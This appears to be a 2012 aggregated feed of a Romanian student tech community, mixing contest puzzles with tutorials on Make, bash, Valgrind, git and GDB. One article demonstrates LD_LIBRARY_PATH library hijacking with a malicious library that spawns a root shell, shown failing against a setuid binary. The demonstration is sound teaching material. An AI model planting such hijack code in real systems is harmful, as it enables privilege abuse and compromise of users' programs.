14 May 2012
Problema 14 a concursului provine de la o modalitate de a mima un cuvânt mai complicat într-un joc de mima.
Ideea e simplă: dacă am un cuvânt complicat mimez bucățele mai simple din el, cuvinte noi, mai scurte și mai ușor de mimat. Nu e obligatoriu ca ele să se potrivească complet. De exemplu aș putea mima FREMEN și OM pentru a duce în cele din urmă la FREON.
Primind o listă de cuvinte se cere să identificați cuvântul original. Aveți acces la wordlist în directorul curent.
Ca input veți primi o linie de cuvinte separate cu spații:
freemen om
Ca output trebuie să scoateți ca output cuvântul care se potrivește
freon
Pentru a-l genera va trebui să parcurgeți wordlist și să identificați cuvintele care “sună ca” o combinație între cuvintele de input. E datoria voastră să definiți ce înseamnă “sună ca” și cum combinați cuvintele.
Se garantează existența unei soluții unice.
Sunt 10 teste fiecare cu câte 10 puncte.
Ponderea este 2.3.

de Mithrandir la 14 May 2012 05:11 AM
07 May 2012
In working with large projects it is necessary to compile from multiple sources. Since this is quite difficult, different tools have been developed to make this task easier. One such tool is GNU Make and the associated executable is make. Make solves compilation from multiple sources problem using the dependency relationships between them, described in a special file usually called Makefile.
Syntax
The file which describes the dependency relationships between project’s sources. It should be named Makefile or makefile and has the following syntax:
target: dependency_list
<tab>command
Usually, the target’s name matches the name of the resulted file, except only those which are .PHONY targets, called virtual targets (they do not generate a specific file). List dependencies include dependencies that are required for target execution. Usually, there are files from which the target will be built. A common mistake is that spaces are used instead of TAB. This will result in an error message when running make. An example Makefile is:
exec:
gcc foo.c bar.c main.c -o exec
This is not the best way we can use make because it doesn’t describe any dependencies, so every time we run make it will run gcc foo.c bar.c main.c -o
exec, even if there are no modified sources. Better use is the following example:
exec: foo.c bar.c main.c
gcc foo.c bar.c main.c -o exec
In this case the target exec will run only if a source has changed. Neither this case takes full advantage of the facilities make offers, because modifying a single source leads to compiling all the existing sources. An ideal Makefile describes the lowest level possible dependencies. In our case it is the object file:
exec: foo.o bar.o main.o
gcc foo.o bar.o main.o -o exec
foo.o: foo.c
gcc -c foo.c -o foo.o
bar.o: bar.c
gcc -c bar.c -o bar.o
main.o: main.c
gcc -c main.c -o main.o
How it works
A particular target is executed by running make target. If there is no argument, it will execute the first target described. To execute a target all of his dependencies must be satisfied. For our example, exec target is executed only after foo.o, bar.o, main.o, which are conditioned by foo.c, bar.c, main.c, are obtained.
Variables
In Makefile files we can declare variables to replace commonly used sequences or which are changed frequently. The variables’ values are obtained using the character $: $(variable_name). For the example above, let’s suppose that one of the source files uses functions from math.h. We will declare a variable that is meant to specify that for linking:
LDFLAGS=-lm
exec: foo.o bar.o main.o
gcc $(LDFLAGS) foo.o bar.o main.o -o exec
foo.o: foo.c
gcc -c foo.c -o foo.o
bar.o: bar.c
gcc -c bar.c -o bar.o
main.o: main.c
gcc -c main.c -o main.o
Make offers several predefined variables, of which the most important are:
$@ - target’s name
$^ - dependecies list
$< - the first dependencie
The Makefile above can be written in a more simple way:
CC=gcc
LDFLAGS=-lm
exec: ana.o are.o mere.o
$(CC) $(LDFLAGS) $^ -o $@
%.o: %.c
$(CC) -c $< -o $@
Variables in a Makefile can also come from the environment where make is running. While running, make sees each environment variable as a local variable with the same name and the same value. Thus, assigning a value for LDFLAGS variable in the example above can cause changes to any compile command. To convert a local variable in an environment variable in order to use it in other Makefile files we use the export directive:
export variable
Inverse transformation is done using unexport:
unexport variable
.PHONY target
If we want a target to be marked permanently as out of date we will use the .PHONY target. Let’s consider that there is a pack target that creates an archive which contains the project’s sources. If there is one source named pack and it does not change, the command associated with this target will not be executed. For this we use .PHONY. Also, by convention all Makefile files contain a .PHONY target called clean used to delete the files obtained from compiling or running the program.
.PHONY: pack
pack:
zip -r project.zip *
clean:
rm *.o *.zip exec
Implicit Rules
Make allows us to use a simplified syntax. For example we don’t always have to write a command for some targets. This is called an implicit rule:
ana.o: ana.c
Another implicit rule is that when running the command make source.c, the file source.c will be compiled even if there is no Makefile. Implicit rules use the environment variables. Thus, the example considered by us is equivalent to:
ana.o: ana.c
$(CC) -c $(LDFLAGS) ana.c -o ana.o
Because implicit rules use environment variables, it is easy to modify their behavior by a simple change of the variables’ values.
Final touches
In many cases, the first target in a Makefile is a target that compiles all of the sources. It is very useful because we don’t have to specify a target every time we are running make.
Adding these changes to our example we get a complete Makefile:
CC=gcc
LDFLAGS=-lm
all: exec
exec: ana.o are.o mere.o
$(CC) $(LDFLAGS) $^ -o $@
foo.o: foo.c
gcc -c foo.c -o foo.o
bar.o: bar.c
gcc -c bar.c -o bar.o
main.o: main.c
gcc -c main.c -o main.o
.PHONY: clean
rm -rf *.o exec
07 May 2012 09:00 PM
05 May 2012
Poblema 13 a concursului pleacă de la o întrebare găsită pe Stack Overflow – Programming Puzzles & Code Golf. De fapt, este chiar întrebarea de acolo, fără a se cere cod cât mai scurt sau alte restricții. Citiți acolo descrierea, inputul, outputul. Deja aveți acolo o implementare, încercați să nu vă inspirați prea mult din ea. Folosiți testele de acolo dar să știți că aici vor fi mult mai complexe.
Contează timpul de execuție, măsurat în secunde, într-o medie de 10 rulări succesive. În plus, timpul maxim de execuție pentru un test este de 100 secunde. Timpul nefolosit pentru un test se reportează testului următor (rotunjit la secunde).
Sunt 10 teste în total. Deci timpul maxim de rulare al programului este de 1000 secunde. Punctajul se calculează ca unde e timpul total obținut de voi. Prin urmare, orice timp sub 500 secunde vă asigură punctaj maxim. După, scade liniar.
Ponderea este 2.2. Spor.
PS: NU voi participa cu un răspuns la întrebarea de pe PCG. Voi puteți participa.

de Mithrandir la 05 May 2012 04:57 PM
Problema 10 a concursului este extrem de simplă. La prima vedere.
Se cere să construiți un program capabil să caute o listă de cuvinte într-o matrice de caractere. Word Search e descrierea problemei pe Wikipedia.
Ca input veți primi două nume de fișier ca argument în linia de comandă. Primul reprezintă descrierea matricii, de exemplu:
TODOW
RACOT
ASDFG
Al doilea reprezintă lista de cuvinte de căutat — nu toate sunt în matrice. De exemplu:
TODO
CAR
DOG
TREE
Dat fiind faptul că aceste cuvinte se pot găsi pe orizontală, verticală sau diagonală, va trebui ca în output să întoarceți câte o linie pentru fiecare cuvânt găsit cu următorul format: cuvântul, linia și coloana caracterului de start (indexate de la 0), direcția exprimată în direcții cardinale (N, E, S, W, NE, SE, NW, SW). NU contează ordinea cuvintelor. De exemplu:
TODO 0 0 E
DOG 0 2 SE
CAR 1 2 W
Sunt 10 teste, fiecare cu câte 10 cuvinte găsibile. Fiecare cuvânt găsit cum trebuie valorează 1 punct. NU există soluții multiple.
Timp de rulare pentru fiecare test: 10s.
Pondere: 1.9.
Mult spor.

de Mithrandir la 05 May 2012 04:25 AM
29 April 2012
Most Linux users prefer to use the CLI because of its efficiency. But the days of the single terminal in which you had your shell are long gone. Users take advantage of the GUI and use graphical terminals like gnome-terminal, konsole or similar utilities, to start several shell instances. For example if you are a programmer, you might want to have one instance for the editor (with the code you are working on), another one to test and debug the compiled executable and – maybe – another for the documentation (man pages). If you are a system administrator you might have a shell with the configuration file of a service, one you use to test the running service, and maybe one shell connected to another server. But having a lot of windows (or tabs) can get confusing.
Some prefer to optimize their environment and use a CLI-oriented Window Manager, like xmonad, to productively manage windows without the use of the mouse. But what if you can only get access to a single terminal, like in the case of a SSH client to a remote host? What if you don’t have a GUI, when configuring a server on-site? Or what if you just like to have one terminal window opened? What you can do is install terminal multiplexing programs like screen or tmux. These programs fork several shell instances behind your primary shell instance and you can switch between them using keyboard shortcuts. Or you can learn to make use of things your shell (bash, for example) already offers you.
Lesson 1: Don’t close things that you will open again soon.
If you are using your editor to write code or to change a configuration file and you want to compile the code or restart a service and test the result, you can send your editor into background with the CTRL-Z keyboard shortcut, that sends a SIGTSTOP signal to the process. You can run other command and then return to your edited file with the fg command. You may have several tasks in background for that shell instance. You can use the jobs command to see them and their jobid, and you can send a specific job in foreground with fg
$JOBID.
Some processes can not be sent into background with the CTRL-Z shortcut. For example, if you have a ssh connection to a remote server where the CTRL-Z will run not on the local host but on the remote host. In this case you will need to use the escape sequence of [ENTER]~ and then send the CTRL-Z signal (you you need to press Enter, then the ~ key, then the CTRL and Z keys together).
Always try to take advantage of the current process’ features. For example you can run make from a vim (or actually run any commands by prefixing them with a !) and you can kill a process from inside a top or htop process.
Lesson 2: Save paths for directories you need.
Unlike a GUI, in a CLI you can go directly to a specific directory from the current one by cd-ing to an absolute or relative path (not going one directory at a time like in the GUI). But you shouldn’t always have to type the path. If you are going back and forth between two directories, use the cd - command to change directory to the last working directory you were in.
If you have several directories you are going to go through, but you know you will return to a specific one, you can use the directory stack to save that directory. You can pushd $DIR a directory into the stack and then popd to change into the top-of-stack directory.
Also, you can always use the reverse history (CTRL-R) to reuse commands already given.
rosedu:~# cd /etc/apache2/sites-available/
rosedu:/etc/apache2/sites-available# cd /var/www/
rosedu:/var/www# cd -
/etc/apache2/sites-available
rosedu:/etc/apache2/sites-available# pushd
/etc/apache2/sites-available /etc/apache2/sites-available
rosedu:/etc/apache2/sites-available# cd /home
rosedu:/home# cd /etc/
rosedu:/etc# popd
/etc/apache2/sites-available
rosedu:/etc/apache2/sites-available#
Lesson 3: Always know who and where you are.
Some people open different terminals to keep track of what they are doing or where they are (and not change the location inside that terminal). The shell is made for having its current directory changes and it helps you know where you are with the prompt. A normal prompts looks like user@host:current_path$. It’s important to know with what user and on what machine you are logged in. The $ and # characters will show you what privileges you have (either limited or administrator). The current\_path is usually the name of the current directory (but it can sometimes be a full path). If that doesn’t provide you enough information, use the pwd command to print the working directory or setup the PS1 variabile to include more information.
Shells like bash have lots of not so well known tricks. But if you learn those tricks, they will make your life easier.
29 April 2012 09:00 PM
28 April 2012
A good programmer has a variety of tools to help him in developing good applications. We talked about gdb in an article at the beginning of April. Now, it is time for a crash introduction to Valgrind.
This program is a collection of different tools. For example, it offers a heap profiler, a thread error detector or a cache profiler. However, the tool which gave Valgrind’s fame is Memcheck, a memory error detector. Because of its popularity, this tool is the default one (to use other Valgrind tools you have to use the --tool=option command line argument). In this article, we will concentrate on Memcheck only.
Detecting memory leaks
Mainly, one would use Valgrind to detect memory leaks in his application. By this, we mean memory which was allocated but wasn’t released back. For example, take this program:
void f()
{
int *a = calloc(1024, sizeof(a[0]));
}
int main()
{
int i;
for (i = 0; i < 1024; i++)
f();
return 0;
}
This program allocates sizeof(int) MB of memory and doesn’t free them. Of course, at the end of the execution, the operating systems takes care of releasing this memory. However, suppose that the f function was instead called from a server executable which shouldn’t be stopped. In this case, each invocation of f will eat away sizeof(int) KB memory (depending on architecture, 4KB or 8KB).
The example is simple, the problem could be observed with naked eyes. However, let’s see what Valgrind tells us:
==11418== Memcheck, a memory error detector
==11418== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==11418== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==11418== Command: ./a.out
==11418==
==11418==
==11418== HEAP SUMMARY:
==11418== in use at exit: 4,194,304 bytes in 1,024 blocks
==11418== total heap usage: 1,024 allocs, 0 frees, 4,194,304 bytes allocated
==11418==
==11418== LEAK SUMMARY:
==11418== definitely lost: 4,194,304 bytes in 1,024 blocks
==11418== indirectly lost: 0 bytes in 0 blocks
==11418== possibly lost: 0 bytes in 0 blocks
==11418== still reachable: 0 bytes in 0 blocks
==11418== suppressed: 0 bytes in 0 blocks
==11418== Rerun with --leak-check=full to see details of leaked memory
==11418==
==11418== For counts of detected and suppressed errors, rerun with: -v
==11418== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 3 from 3)
The number that gets repeated on each line of the output is the PID of our executable. At the end of the run, we are offered a heap summary (from where we can see that our program allocated 4MB of memory) and a leak summary.
Let’s see what happens after we take into account the suggestion to run with --leak-check=full. First, we compile the program adding debugging information, using the -g GCC flag. And, then, we run the executable under Valgrind:
mihai@keldon:/tmp/mm/valgrind$ valgrind --leak-check=full ./a.out
==11527== Memcheck, a memory error detector
==11527== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==11527== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==11527== Command: ./a.out
==11527==
==11527==
==11527== HEAP SUMMARY:
==11527== in use at exit: 4,194,304 bytes in 1,024 blocks
==11527== total heap usage: 1,024 allocs, 0 frees, 4,194,304 bytes allocated
==11527==
==11527== 4,194,304 bytes in 1,024 blocks are definitely lost in loss record 1 of 1
==11527== at 0x4C29024: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11527== by 0x4004F2: f (1.c:6)
==11527== by 0x400513: main (1.c:14)
==11527==
==11527== LEAK SUMMARY:
==11527== definitely lost: 4,194,304 bytes in 1,024 blocks
==11527== indirectly lost: 0 bytes in 0 blocks
==11527== possibly lost: 0 bytes in 0 blocks
==11527== still reachable: 0 bytes in 0 blocks
==11527== suppressed: 0 bytes in 0 blocks
==11527==
==11527== For counts of detected and suppressed errors, rerun with: -v
==11527== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 3 from 3)
This time, we see that the memory was allocated in line 6 in function f. This allows us to insert the needed free at the correct spot.
Quick question: what would have happened if our program was compiled with optimizations on (try -O3 for example)?
Wrong cases of memory release
What happens when we free the same memory address twice? Let’s use this program:
void *f()
{
int *a = calloc(16, sizeof(a[0]));
free(a);
return a;
}
int main()
{
int *a = f();
free(a);
return 0;
}
Running it with Valgrind yields:
mihai@keldon:/tmp/mm/valgrind$ valgrind ./a.out
==11734== Memcheck, a memory error detector
==11734== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==11734== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==11734== Command: ./a.out
==11734==
==11734== Invalid free() / delete / delete[] / realloc()
==11734== at 0x4C29A9E: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11734== by 0x40057A: main (1.c:14)
==11734== Address 0x51d2040 is 0 bytes inside a block of size 64 free'd
==11734== at 0x4C29A9E: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11734== by 0x400552: f (1.c:7)
==11734== by 0x40056A: main (1.c:13)
==11734==
==11734==
==11734== HEAP SUMMARY:
==11734== in use at exit: 0 bytes in 0 blocks
==11734== total heap usage: 1 allocs, 2 frees, 64 bytes allocated
==11734==
==11734== All heap blocks were freed -- no leaks are possible
==11734==
==11734== For counts of detected and suppressed errors, rerun with: -v
==11734== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 3 from 3)
We can see both locations where the memory was released.
Now, consider this C++ code, a tweaked version of the above:
int *f()
{
int *a = (int *)calloc(16, sizeof(a[0]));
return a;
}
int main()
{
int *a = f();
delete a;
return 0;
}
Running under Valgrind, we receive the following output (we will use -q to show only the errors reported by Valgrind – no header and no statistics at the end):
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==11757== Mismatched free() / delete / delete []
==11757== at 0x4C2972C: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11757== by 0x400659: main (1.c:13)
==11757== Address 0x59e0040 is 0 bytes inside a block of size 64 alloc'd
==11757== at 0x4C29024: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11757== by 0x400632: f() (1.c:6)
==11757== by 0x400649: main (1.c:12)
Before finishing this section, let’s consider the case of freeing from inside an allocated block. See this code:
void *f()
{
int *a = calloc(16, sizeof(a[0]));
return a + 4;
}
int main()
{
int *a = f();
free(a);
return 0;
}
Valgrind gives the following output:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==11765== Invalid free() / delete / delete[] / realloc()
==11765== at 0x4C29A9E: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11765== by 0x400572: main (1.c:13)
==11765== Address 0x51d2050 is 16 bytes inside a block of size 64 alloc'd
==11765== at 0x4C29024: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11765== by 0x400542: f (1.c:6)
==11765== by 0x400562: main (1.c:12)
From this we can easily see that we tried to free from inside an allocated block instead of using the block’s address. Moreover, we find where the block was allocated and we can fix our program now.
Incorrect usage of memory
Let’s see this simple code:
struct s {
int a, b;
};
int main()
{
struct s s;
s.a = 42;
if (s.b)
printf("s.b\n");
return 0;
}
We didn’t initialize s.b. Valgrind reports this:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==11868== Conditional jump or move depends on uninitialised value(s)
==11868== at 0x4004F0: main (1.c:12)
==11868==
This was simple. Now, consider this common case:
int main()
{
char *s = strdup("Valgrind rocks");
char *q = malloc(strlen(s));
strcpy(q, s);
return 0;
}
This code looks perfectly valid. Does it? Valgrind says otherwise:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==12038== Invalid write of size 1
==12038== at 0x4C2B27F: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12038== by 0x4005FC: main (1.c:9)
==12038== Address 0x51d209e is 0 bytes after a block of size 14 alloc'd
==12038== at 0x4C2A93D: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12038== by 0x4005E5: main (1.c:8)
Indeed, we missed space for the \0 terminating character. Suppose we do this fix: we change strcpy(q, s) with strcpy(q, s + 1). This works.
Now, let us assume that – by mistake – we also change q:
int main()
{
char *s = strdup("Valgrind rocks");
strcpy(s, s + 1);
return 0;
}
Valgrind is prompt to show us that we use strcpy in a wrong way, possibly destroying content:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==12058== Source and destination overlap in strcpy(0x51d2040, 0x51d2041)
==12058== at 0x4C2B2F5: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12058== by 0x400600: main (1.c:9)
But what if that was the indented behaviour? What if we really needed to remove the first letter of s?
We can generate a suppression and use it in other calls of Valgrind to ignore this error. To generate it, we use another flag:
mihai@keldon:/tmp/mm/valgrind$ valgrind --gen-suppressions=yes -q ./a.out
==12079== Source and destination overlap in strcpy(0x51d2040, 0x51d2041)
==12079== at 0x4C2B2F5: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12079== by 0x400600: main (1.c:9)
==12079==
==12079==
==12079== ---- Print suppression ? --- [Return/N/n/Y/y/C/c] ---- y
{
<insert_a_suppression_name_here>
Memcheck:Overlap
fun:strcpy
fun:main
}
We copy the printed lines into a file, strcpy_main.supp:
{
strcpy_main
Memcheck:Overlap
fun:strcpy
fun:main
}
When we run Valgrind again, we will use this file to ignore that error.
mihai@keldon:/tmp/mm/valgrind$ valgrind --suppressions=strcpy_main.supp -q ./a.out
mihai@keldon:/tmp/mm/valgrind$
Even though this works, we should not use strcpy with overlapping arguments. The manual page for strcpy tells:
The strcpy() function copies the string pointed to by src, including
the terminating null byte ('\0'), to the buffer pointed to by dest. The
strings may not overlap, and the destination string dest must be large
enough to receive the copy.
One last word before finishing this article. If your program has too many errors, Valgrind tries to be funny and gives the following message:
==21573== More than 10000000 total errors detected. I'm not reporting any more.
==21573== Final error counts will be inaccurate. Go fix your program!
You should do this, of course.
In a later article we will show how can you combine Valgrind and GDB to fix some nasty bugs. But until then, remember how to use Memcheck and keep in mind that Valgrind has many useful tools and a programmer can create others if he needs them.
28 April 2012 09:00 PM
Problema 12 a concursului se bazează pe concepte importante din teoria limbajelor funcționale :) Va fi ceva mai grea decât cele de până acum dar nu foarte.
Se cere să implementați un evaluator de expresii ce folosesc combinatori SKI.
Ca input, prin stdin, veți primi o expresie bine formată conțînând doar S, K, I, ( și ). Folosind regulile de evaluare va trebuie să reduceți expresia până la forma minimă.
Afișați outputul la stdout, expresia minimizată.
De exemplu, pentru inputul SKSK veți afișa K, rezultând din evaluarea SKSK -> KK(SK) -> K. Similar, pentru inputul KKKSKS veți afișa SS, conform lanțului KKKSKS -> KSKS -> SS.
Sunt 100 de teste, fiecare valorând 1p.
Ponderea este de 2.1.
Spor.
PS: Ca istorie, prima dată când am făcut cunoștință cu acești combinatori a fost primul CCC văzut, acum 2,5 ani. Anul trecut la un laborator de PP în care predam Lambda 0, Ștefan citea To Dissect a Mockingbird, legată de To Mock a Mockingbird (titlu similar cu To Kill a Mockingbird dar fără legătură; oricum le pun pe ambele pe lista de cărți de citit). Finally, cam acum 1 an Luci mi-a dat link către ediția din 2011 a ICFP PC: Lambda the Gathering. De atunci am în plan un anumit proiect, va fi făcut cândva.

de Mithrandir la 28 April 2012 11:10 AM
25 April 2012
Programul de lucru pe vară la proiecte Open Source, de acasă, inițiat acum 5 ani de către ROSEdu, continuă cu forțe proaspete!

Anul acesta, miza crește pentru studenți, prin bursa de 1000 € și desigur prin provocările tehnice ridicate de proiectele propuse.
Ce trebuie să faci dacă vrei să fii unul dintre participanții la acest program:
- să manifești interes pentru unul dintre proiectele software propuse
- să aplici: nu-i greu, te pregătești, scrii aplicația, ceri feedback și convingi
Ce vei câștiga de pe urma RSoC:
- experiență de lucru într-un proiect software
- experiență în lucrul cu o comunitate
- libertatea de a sta acasă/la munte/la mare plătit
de Alex Eftimie la 25 April 2012 06:07 PM
22 April 2012
Based on the previous article, let’s go one step further and study a similar exploit. This time we’ll be dealing with executables and dynamic libraries.
Let’s consider a simple custom library function:
/* random.h */
int xkcd_random(void);
/* random.c */
int xkcd_random()
{
return 4;
}
We can build it into a shared library:
$ gcc --share -fPIC -o librandom.so random.c
Let’s take a simple program that uses our function:
/* main.c */
#include <stdio.h>
#include "random.h"
int main(void)
{
printf("8ball says:%d\n", xkcd_random());
return 0;
}
If we want to use out shared object file in the current directory, we have to do two things. First, compile the program and link the shared library (with the -l flag) using libraries in the current directory (we do that using the -L. flag).
$ gcc -o main -L. main.c -lrandom
Second, the library will be linked at compile time, but it won’t be loaded at runtime unless the loaded knows where the library is, with the help of the LD_LIBRARY_PATH variable.
$ ./main ./main: error while loading shared libraries:
librandom.so: cannot open shared object file: No such file
or directory
$ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
$ ./main
8ball says:4
To ensure that we can always use the library, we can place it in the system’s library directory. Note that this means that we trust the code of that library and only the administrator can do this
# mv librandom.so /usr/lib
So now, each time the main program runs, the loader will dynamically load the random function from the system. But what if we have another function, from another library that has the same name, but does something else:
/* evil.c */
#include <unistd.h>
int xkcd_random()
{
return 666;
}
$ gcc --share -fPIC -o librandom.so evil.c
If we overwrite the LD_LIBRARY_PATH variable with the . directory, the loader will use the ./librandom.so instead of /usr/lib/librandom.so and it doesn’t require any modification of the main program (no recompile needed).
$ ./main
8ball says:4
$ export LD_LIBRARY_PATH=.:LD_LIBRARY_PATH
$ ./main
8ball says:666
This is a similar to the PATH variable hack discussed in the previous article, but at a much more lower level. We can add a possible exploit here, like a shell execution:
#include <unistd.h>
int xkcd_random()
{
execlp("/bin/sh", "/bin/sh", NULL);
return 666;
}
Like we did before, we used a root-owned executable that had the SETUID bit set, in order to run things as root.
$ ls -la main
-rwsrwsr-x 1 root root 7192 2012-04-18 15:13 main
$ export LD_LIBRARY_PATH=.:LD_LIBRARY_PATH
$ ./main
8ball says:4
The program executed safely.
The Library Loader is smart enough to ignore the LD_LIBRARY_PATH when the executable is setuid-ed, because of exact such attacks. So even though you can exploit programs as a normal user, you can’t affect system. So low level is a little more secure than scripting level.
Here is a related article that explains why LD_LIBRARY_PATH exists but also why it’s evil.
22 April 2012 09:00 PM
21 April 2012
Problema 11 a concursului apare mai repede decât e anunțat în regulament doar pentru ca media să fie cum trebuie :P E destul de lejeră, ar trebui să fie făcută destul de repede. și e cam ultima de acest fel, sau prima :P
Ideea e simplă. Se cere să simulați un automat celular descris de Stephen Wolfram până la o anumită iterație și din șirul obținut acolo să extrageți toate pattern-urile de o anumită lungime care se repetă de mai mult de un anumit număr de ori.
Ca input, veți primi ca argumente în linia de comandă un set de 4 numere.
Primul dintre ele specifică regula după care va trebui să construiți automatul (Wolfram Code). De exemplu 30 se va traduce în exact regula din titlu. Regula zice ce culoare va avea o celulă în iterația următoare pe baza culorilor curente deținute de celulele dintr-o vecinătate a celulei curente.
Vecinătatea este fixată la 1 pentru etapa curentă. Una dintre etapele următoare va ridica această restricție. Puteți să vă folosiți de asta când veți scrie codul.
Al doilea număr specifică iterația la care trebuie să ajungeți. Simulați automatul până acolo. Aveți grijă că acest număr poate fi maxim 1024 pentru această problemă dar va fi ridicată și restricția asta în viitor.
Al treilea număr specifică lungimea patternului (maxim 10 pentru etapa asta) iar ultimul specifică numărul minim de apariții (pozitiv, maxim 5 pentru etapa asta).
Un exemplu de linie de comandă este:
execname 30 10 3 3
Semnificând identificarea tuturor pattern-urilor de lungime 3 care se repetă de cel puțin 3 ori în a 10-a iterație a unui automat ce evoluează după rule 30. Adică, linia 10 din imaginea următoare (linia de start, cea cu un singur pătrat este 0; linia la care ne referim începe cu NNAANA și se termină cu NNAAN).

Ca output veți afișa fiecare pattern pe o linie: întâi tipul pattern-ului (N pentru negru, A pentru alb) și apoi lista de coordonate ale poziției de start, cu originea dată de poziția celulei de pe prima linie. În cazul nostru, veți afișa.
NNA -10 3 6
NAA -9 -6 7
AAN -8 -3 8
Pattern-urile pot fi afișate în orice ordine.
Timpul de rulare este dat de formula următoare unde este numărul iterației în care trebuie să căutați pattern-ul.
Ponderea este de 2.0.
Spor.
PS: Ca istorie, în anul 2 de facultate citeam ANKS. Și încă de pe atunci am fost fascinat de pattern-ul din ultima poză de la finalul articolului regulii. Ieri mi-am reamintit de ieri în timp ce testam chestii legate de pattern-urile de la Boltz. :P

de Mithrandir la 21 April 2012 02:15 PM
20 April 2012
If you didn’t read the techblog Git Tips and Good Practices article yet, you should, as it offers tips every git user should know, together with some very useful references.
When using git for the first time, one has to specify his name and email, so git can associate the commit with who committed it:
$ git config --global user.name "Firstname Lastname"
$ git config --global user.email "your_email@youremail.com"
This adds info to ~/.gitconfig, a global configuration file git uses. Also, every git project has its own .git/config file (similar to the global one), and any options from this file overwrites the options from the global file.
andrei@sherlock:~$ cat ~/.gitconfig
[user]
name = Andrei Petre # filled by the
email = p31andrei@gmail.com # above commands
[color]
ui = auto
pager = true
[core]
editor = vim
[github]
user = andreip
token = ...
[alias]
co = checkout
ci = commit
st = status
br = branch
df = diff
pa = add --patch
rlog = reflog # useful for lost SHA's
type = cat-file -t
dump = cat-file -p
hist = log --pretty=format:\"%h %ad | %s%d [%an]\" --graph --date=short
lg = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset
%s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit --date=relative
Most of these configurations are self explanatory. The part that I find it most useful and what this article was all about (but needed an intro) are the last two aliases.
git lg (from Andrei Maxim) is also a short and pretty formatting version of git log
Use the one you like best, and add speed to your workflow.
20 April 2012 09:00 PM
07 April 2012
Problema 9 pentru concurs vine înainte de termen, ca o recompensă pentru întârzierile de la celelalte. Este inspirată dintr-un comic văzut azi — da, am renunțat la 9gag dar văd altele — și e destul de simpluță.
Reducem jocul la un joc cu un singur jucător pentru a fi mai simplu și a se potrivi cu tema concursului. Se dă un careu de în care vor trebui trecute numerele , fiecare o singură dată. Presupunem că Mike a completat deja un anumit număr de celule. Randall va trebui să le completeze pe celelalte în așa fel încât să existe un drum de pe linia de sus până pe linia de jos trecând doar prin celulele cu valori maxime pe linie.
Un drum poate merge numai prin celule cu cel puțin un colț în comun.
Ca input veți primi un nume de fișier ca argument în linia de comandă. Conținutul fișierului conține numere și caracterul ? pentru căsuțele goale. Toate numerele sunt aliniate dreapta. De exemplu:
1 2 3 ?
11 10 4 ?
? ? ? 8
Ca output printați la stdout același careu cu toate numerele completate. Trebuie să existe un drum de sus până jos pentru a fi validă soluția. De exemplu, veți afișa
1 2 3 5
11 10 4 12
7 6 9 8
cu drumul: 5 – 12 -9. Observați că se aliniază și în output numerele la dreapta și că nu există spații puse aiurea (deci nu printați de exemplu cu %5d numere de 2 cifre).
Sunt 10 teste, fiecare test trecut valorează 10 puncte. Fiecare careu umplut corect dar care nu oferă un drum de pe prima până pe ultima linie primește doar 2 puncte.
Timp de rulare pentru fiecare test: 1s.
Ponderea este de 1.8. Încă puțin și se ajunge la probleme de valoare dublă primeia (dar nu se va mai putea rezolva aia în curând, vedeți regulamentul).
Spor.

de Mithrandir la 07 April 2012 07:01 PM
02 April 2012
The GNU Debugger Command (GDB) is a very useful debugging tool, widely used in the C environment.
Workflow
GDB can be run in two distinct ways:
- using the gdb command
- using a core generated file, usually from a serious error
Let’s have a look at the former one on a simple program:
int random() {
int r = 4;
return r;
}
int main() {
char *no_addr = 0;
*no_addr = random();
return 0;
}
The -g compiler option is used to add debugging information to the executable (here a.out) for use by GDB. We’ll run it again using gdb, because the above code gives us a segfault error:
$ gcc -Wall -g random.c
$ gdb a.out
[...]
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x080483c5 in main () at random.c:7
7 *no_addr = random();
So this helps us a lot, it even shows us the line causing the problem. Now we’ll create a core file to show how the latter one works, too. Note that # at the beginning of the line specifies that commands are run as root:
# ulimit -c 4 # set core file size to 4 blocks
# ./a.out
Segmentation fault (core dumped)
# gdb ./a.out core
Core was generated by `./a.out'.
Program terminated with signal 11, Segmentation fault.
#0 0x080483cd in main () at random.c:7
7 *no_addr = random();
Useful commands
Let’s see a common workflow, while using GDB:
$ gdb a.out # run with gdb debugger
(gdb) break main # set up breakpoint at main() function
Breakpoint 1 at 0x80483bc: file random.c, line 6.
# this suspends the program
# can also receive file name (break random.c:3)
# or address (break *0x080483c5)
(gdb) run # .. just run the thing
Starting program: /home/andrei/a.out
Breakpoint 1, main () at random.c:6 # it stops at first breakpoint
6 char *no_addr = 0;
(gdb) next # execute next line, doesn't enter functions
7 *no_addr = random();
(gdb) step # like next, but enters functions
random () at random.c:2
2 int r = 4;
(gdb) next
3 return r;
(gdb) print r # print values in decimal
$1 = 4
(gdb) print /x # hexa
$2 = 0x4
(gdb) print /o # octal
$3 = 04
